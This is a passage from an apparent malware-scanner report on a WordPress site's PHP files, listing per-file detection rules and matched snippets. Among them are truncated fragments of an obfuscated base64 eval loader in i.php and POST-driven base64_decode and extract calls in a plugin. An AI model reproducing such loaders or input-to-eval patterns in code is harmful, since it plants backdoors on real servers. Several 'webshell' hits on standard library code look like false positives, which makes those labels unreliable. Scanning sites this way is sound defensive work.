</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_179").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/download-manager/wpdm-functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 64.65 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_180" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'force'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_180").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-content/plugins/download-manager/libs/class.Apply.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 31.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_181" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit extract_global <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">extract</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'wpdm_reg'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_181").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/i.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:34</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:46:52</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_182" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_182").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/libraries/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 185.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_183" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_183").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_184" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$e'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'trigger_error($e-&gt;getMessage(),&nbsp;E_USER_ERROR);'</span><span style="color: #007700">);&nbsp;}&nbsp;else{&nbsp;</span><span style="color: #0000BB">$exception_handler&nbsp;</span><span style="color: #007700">=&nbsp;function(</span><span style="color: #0000BB">$e</span><span style="color: #007700">){&nbsp;</span><span style="color: #0000BB">trigger_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$e</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">(),&nbsp;</span><span style="color: #0000BB">E_USER_ERROR</span><span style="color: #007700">);&nbsp;};&nbsp;}&nbsp;</span><span style="color: #0000BB">set_exception_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$exception_handler</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$option_name&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">'_Options'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$options_default&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">PMXI_Config</span><span style="color: #007700">::</span><span style="color: #0000BB">createFromFile</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">ROOT_DIR&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/config/options.php'</span><span style="color: #007700">)-&gt;</span><span style="color: #0000BB">toArray</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$options_default</span><span style="color: #007700">);&nbsp;require_once&nbsp;</span><span style="color: #0000BB">ABSPATH&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'w...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_184").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Reader/Excel5.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 285.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_185" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_185").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Helper/HTML.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 24.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_186" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">lave</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_186").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 209.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_187" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_187").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/OLERead.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_188" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_188").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/File.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_189" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_189").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/wp-content/plugins/wp-all-import/helpers/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:54</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_190" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval&nbsp;(</span><span style="color: #DD0000">"return&nbsp;(</span><span style="color: #0000BB">$str</span><span style="color: #DD0000">);"</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$then&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$else</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'is_empty'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">is_empty</span><span style="color: #007700">(</span><span style="color: #0000BB">$var</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;empty(</span><span style="color: #0000BB">$var</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_human_filesize'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_human_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$decimals&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$sz&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'BKMGTP'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$factor&nbsp;</span><span style="color: #007700">=&nbsp;(int)&nbsp;</span><span style="color: #0000BB">floor</span><span style="color: #007700">((</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)&nbsp;/&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(</span><span style="color: #DD0000">"%.</span><span style="color: #007700">{</span><span style="color: #0000BB">$decimals</span><span style="color: #007700">}</span><span style="color: #DD0000">f"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$bytes&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">pow</span><span style="color: #007700">(</span><span style="color: #0000BB">1024</span><span style="color: #007700">,&nbsp;</span><span style="color: 